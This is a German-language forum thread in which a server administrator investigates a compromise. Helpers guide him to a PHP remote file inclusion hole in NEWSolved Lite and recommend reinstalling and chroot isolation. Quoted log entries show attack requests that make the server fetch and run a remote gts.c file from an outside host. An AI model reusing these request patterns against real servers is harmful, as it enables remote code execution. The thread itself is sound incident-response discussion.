Hack? Server macht "injection attacks" auf anderen Server / gts.c

[clonecommander]

Hi!

Ich habe eben von meinem Serverprovider als Anhang folgende Mail erhalten:

We have received evidence of web server injection attacks against
> some servers from a machine under your constituency, below
> you will see the log as recorded in the webserver logs.
>
>
> MEINEIP - - [21/Feb/2007:06:02:50 +0100] "GET
> /doc/index.php?start=http://209.172.xxx.xxx/~paradis/gts.c? HTTP/1.1" 404
> 6791 "-" "libwww-perl/5.803"
>
>
> This webserver is in Spain, and the current timezone is
> CET (GMT+1 , +2 in summer)
>
>
> Please investigate this unauthorised use and send us back your
> findings.
>
>
> If we can be of any further assistance in this matter, please do not
> hesitate to contact us. Thank you for your time and assistance.

Ich habe sofort meine Logs gecheckt: In der globalen apache2 access_log befindet sich u.A. folgender Eintrag:

127.0.0.1 - - [21/Feb/2007:05:57:53 +0100] "GET /?L=http://209.172.xxx.xxx/~paradis/gts.c%3f HTTP/1.1" 200 266 "-" "libwww-perl/5.803"

und in der error-log wurde versucht eine "bc.txt" in von selber Adresse herunter zu laden.

In den logs der einzelnen vhosts finde ich aber nichts (System: SuSE 9.3 x64 mit Plesk 8.1)

chkrootkit & rkhunter finden keine rootkits, aber es ist jadann komisch, dass als IP die 127.0.0.1, also localhost, angegeben ist. Auch beim Durchsehen der Prozesse ist mir nichts neues bzw. fremdes aufgefallen.

Wie soll ich weiter vorgehen? ich weiß gerade nicht wie ich das Ganze weiter eingrenzen kann... hat jemand 'nen tip oder bereits Erfahrungen mit genau dem selben Problem?

MfG Tibor

[djcrackman]

mod_proxy aktiviert?

[clonecommander]

öhm, wie kann ich das prüfen (also obs aktuell läuft)?

in der /etc/apache2/sysconfig.d/loadmodule.conf

ist es jedenfalls nicht drin...

€: grad läuft da ein neue ominöser Prozess:

wwwrun 20008 21.8 0.2 17024 2504 ? R Feb21 343:05 /usr/sbin/httpd


wie kann ich mehr über den rausfinden? der läuft losgelöst vom "normalen" apache, denn das ist ja der httpd2.
und /usr/sbin/httpd existiert auch garnicht...

€2: und cpusd lief auch unter wwwrun, also wohl auch NICHT der "original" cupsd ^^

[lord_pinhead]

Neuaufsetzen, das ist ein Perlscript das irgendwo im System läuft, kuck mal unter /tmp ob da was merkwürdiges liegt. Vielleicht die PID nehmen und in /proc/<pid>/ nachsehen wo das Programm geladen wird (sofern ein Rootkit das nicht alles sperrt)

Schonmal ein Portscan von aussen gemacht, vielleicht hat jemand einen Shell aufgemacht ohne das du es merkst. Jedenfalls solltest du die Kiste so schnell wie möglich trocken legen.

[clonecommander]

also in /tmp ist nichts, die ordner des prozesses hab ich gesichert, wo sehe ich da wo es geladen wird?

wie mach ich am besten nen portscan von aussen? bin da nicht so erfahren ^^

die prozesse sind sichtbar und die systemkommandos sind alle noch "intakt" (bzw. sollten es sein) - laut rkhunter und chkrootkit

aber ok, du rätst mir zum neu aufsetzen - aber ich würde gerne die Lücke finden, durch die das eingedrungen ist... sonst hab ichs nach dem neu aufsetzen weg und 3 tage später ists wieder da...

gibts da noch tipps?

ich bahalte die Kiste solange im Auge, außer den 2 Prozessen die seit vorgestern liefen istauch nichts mehr passiert. load ist unten, die cpu usage - stats haben sich seitdem auch beruhigt.

[twisterchen]

Also ich würde erstmal alle prozesse die du kennst zB
Plesk
Apache2
mysql
qmail usw

abschalten und dann weiterkuken was passiert

[clonecommander]

jup, ich behalte alles im Auge, bis jetzt tut sich nichts...

die Frage ist nur: Woher kam das... erst dann kann ich wohl leider weitere Maßnahmen ergreifen oder?

Wenn ich jetzt neu aufsetze und die Lücke liegt bei einer Webseite, ist die ja nachher auch wieder da und kann erneut genutzt werden...

edit: ja! ich habe eben in den Logs eines vHosts folgendes gefunden:

192.93.2.1 - - [21/Feb/2007:05:21:59 +0100] "GET /Page/News//inc/output/news_theme3.php?abs_path=http://209.172.33.216/~paradis/gts.c? HTTP/1.0" 200 33788 "-" "libwww-perl/5.5395"

Die Uhrzeit kommt auch hin, ich denke damit habe ich den Übeltäter.

Die Software ist folgende:

Powered by NEWSolved Lite 1.9.2 © 2003-2007 usolved.net
All rights reserved

--> vhost abgeschaltet :)


edit²: googlen ergab hier: http://www.us-cert.gov/cas/bulletins/SB06-226.html

Multiple PHP remote file inclusion vulnerabilities in USOLVED NEWSolved Lite 1.9.2, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) newsscript_lyt.php, (2) newsticker/newsscript_get.php, (3) inc/output/news_theme1.php, (4) inc/output/news_theme2.php, or (5) inc/output/news_theme3.php.

ich würde sagen das war's... was meint ihr? soll man das cms ganz kicken oder sollte es eine neue Version tun??? meint ihr server reinstall ist notwendig? ich denke ich habe alle kicken können, die load ist unten, alles ruhig und keine versteckten Prozesse laut chkrootkit...

alles nur, weil da einer gepennt und wieder alte versionen drauf gelassen hat...

[twisterchen]

Naja ich hatte auch schonmal einen gerooteten Server vor 2 Jahren und weiss heute, dass es an mir gelegen hat nicht an den Kunden die Ihre Seiten auf dem Server haben.

Die Admins hier sagen immer wieder man sollte seine Sicherheits Politik nochmal überdenken.

Ich würde mich nicht darauf verlassen ob der Server nicht doch vielleicht irgend was hat.

[clonecommander]

ja gut, klar... ich werde sicher nochmal nachforschen und das tun, was in meiner Macht steht, um alles so sicher wie mir möglich zu machen - aber ich denke doch mal die log ist eindeutig oder? (zumindest dieses mal)

[daemotron]

...allow remote attackers to execute arbitrary PHP code...

Wenn Du den Webserver bzw. PHP nicht schön in einem Jail (oder grsecurity- bzw. RSBAC-gesicherten chroot) weggeschlossen hast, musst Du davon ausgehen, dass der Angreifer vielleicht noch andere Exploits eingeschleust hat und möglicherweise sogar root-Rechte erlangen konnte. Ich an Deiner Stelle würde dem System jedenfalls nicht mehr trauen (es sei denn, Du hast geeignete Monitoring-Instrumente, die Veränderungen am System außerhalb desselben und damit für Angreifer unerreichbar protokollieren) und eine Neuinstallation in die Wege leiten.

[rootsvr]

Das Log ist relativ eindeutig das es daher kam, ja da stimme ich zu, aber seit dem Moment seit eine fremde Software auf deiner kiste ausgeführt wurde kannst Du keinem Logfile mehr trauen.

Ob sich jetzt nen Rootkit eingenistet hat und sich vor chktrootkit und co versteckt weißt Du nicht. ich würde plattmachen nen backup der Daten einspielen und vor dem aktivieren der Serverdienste alle Versionen auf aktuelle Lücken und neuste Versionen überprüfen.

[sledge0303]

Es gibt sehr gute Sicherheitskonzeptionen wie man versuchen kann sowas zu verhindern. 100%ig kann man nie einen Einbruch ausschließen.

Du erstellst, jfreund hat es beschrieben, gute chroot/Jail Umgebungen für den Webserver. Damit ist zwar die Möglichkeit eines Einbruchs nicht ausgeschlossen, kann aber die Folgen entschieden mildern. So bräuchtest du dich "nur" um das chroot kümmern, anhand der Logs die Sicherheitslücke finden, fixen und bei der Neuinstallation des Apachen (chrooted) berücksichtigen.
Dabei kann es sich um komplette chroots für Webserver oder Webverzeichnisse werden ge'chroot'ed.
Ich selber setze seit kurzem auf dem Lighttpd mit chrooted Userdir für meine Homepage.
Ist sehr einfach einzurichten, auch für Anfänger geeignet IMHO.
Die Dokumentation über den Lighty ist wirklich sehr gut!!!

[clonecommander]

jo, das werde ich mir auf jeden Fall mal genauer ansehen...

vielen Dank nochmal an alle für die prompte Hilfe!